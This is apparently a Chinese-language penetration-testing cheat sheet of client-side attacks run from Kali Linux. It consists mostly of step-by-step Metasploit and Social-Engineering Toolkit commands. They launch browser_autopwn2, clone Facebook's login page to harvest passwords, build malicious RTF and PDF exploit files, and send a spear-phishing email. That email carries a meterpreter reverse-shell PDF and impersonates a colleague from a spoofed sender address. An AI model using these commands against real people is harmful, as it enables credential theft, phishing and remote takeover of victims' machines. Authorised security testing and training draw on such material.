kali客户端攻击

浏览器攻击

browser_autpwn2 （BAP2）

　mkdir /test　　为接受响应的服务器创建目录 
  use auxiliary/server/browser_autopwn2
  set SRVHOST 192.168.56.1
  set URIPATH /test
　　　#假设我们的攻击目标是 PC，并不打算依赖于 Adobe Flash 的授权。我们会排除 Android 和 Flash 的利用。
　   　set EXCLUDE_PATTERN android|adobe_flash    
　　 　show advanced    查看高级选项的完整列表
　　 　set ShowExploitList true
　　 　set VERBOSE true
　exploit
　使目标浏览器访问http://192.168.56.1/test

窃取浏览器登录凭证
root@bt:# service apache2 start
root@bt:# setoolkit

Social-Engineering Attacks --> Website Attack Vectors --> Credential Harvester Attack Method --> Site Cloner

IP address for the POST back in Harvester/Tabnabbing: 填写本机IP

set:webattack> Enter the url to clone:http://www.facebook.com(要克隆伪造的页面)

此时会在/var/www/中生成3个文件,保存在html文件夹中,此时访问本机ip时，则会出现相同登录页面,若目标登录，会把密码储存在生成的harvester文件中

Office

ms10_087漏洞，执行自定义的exe文件

msf > db_status  postgresql selected, no connection
msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml
msf > search office
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/exec
msf exploit(ms10_087_rtf_pfragments_bof) > set cmd calc.exe
msf exploit(ms10_087_rtf_pfragments_bof) > exploit
[+] msf.rtf stored at /root/.msf4/local/msf.rtf

root@kali:~# cd /root/.msf4/local 生成的msf.rtf
/*************************************************************************/

PDF

use exploit/windows/fileformat/adobe_utilprintf　　
(Adobe Reader版本应低于8.1.2)
set FILENAME malicious.pdf
set PAYLOAD windows/exec
set CMD calc.exe
show options
exploit

从PDF中分析和提取payload可以使用 PDF Stream Dumper 工具

恶意PDF分析可以参考：

https://zeltser.com/analyzing-malicious-documents/

https://zeltser.com/peepdf-malicious-pdf-analysis/

MailAttack

set> 1 　　Social-Engineering Attacks
set> 1 　　Spear-Phishing Attack Vectors
set:phishing>1 　　    Perform a Mass Email Attack
set:payloads>6 　　 Adobe CoolType SING Table "uniqueName" Overflow
set:payloads>2 　　 Windows Meterpreter Reverse_TCP

set:payloads> Port to connect back on [443]:

All payloads get sent to the /pentest/exploits/set/src/program_junk/template.pdf directory

Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

=
ruby /opt/framework/msf3//msfcli exploit/windows/fileformat/adobe_cooltype_sing PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=443 OUTPUTPATH=/root/.msf4/local/template.pdf FILENAME=/pentest/exploits/set/src/program_junk/template.pdf ENCODING=shikata_ga_nai E

然后需要特殊处理。这个漏洞针对的Adobe 阅读器的版本是9.3.4之前。

把template.pdf拷贝到一个安装有Adobe Acrobat Pro 9.5.0的机器上（关闭防病毒软件），打开template.pdf，修改后拷贝回原目录下，覆盖原有的template.pdf

set:phishing>2
set:phishing> New filename:Dvssc_ABC_Project_Statue.pdf
set:phishing>1 E-Mail Attack Single Email Address
set:phishing>2    One-Time Use Email Template
set:phishing> Subject of the email:ABC Project Status
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p

set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:
Next line of the body: Hi Wang:
Next line of the body: Please review the ABC project status report. We are behind the schedule. I need your advice.
Next line of the body:
Next line of the body: Best Regard!
Next line of the body: li Ming
Next line of the body: ^Cset:phishing> Send email to:wangdongpeng@dvssc.com

set:phishing>2 Use your own server or open relay
set:phishing> From address (ex: moo@example.com):liming@dvssc.com
set:phishing> Username for open-relay [blank]:yourname
Password for open-relay [blank]:
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):mail.163.com
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
[*] SET has finished delivering the emails
set:phishing> Setup a listener [yes|no]:yes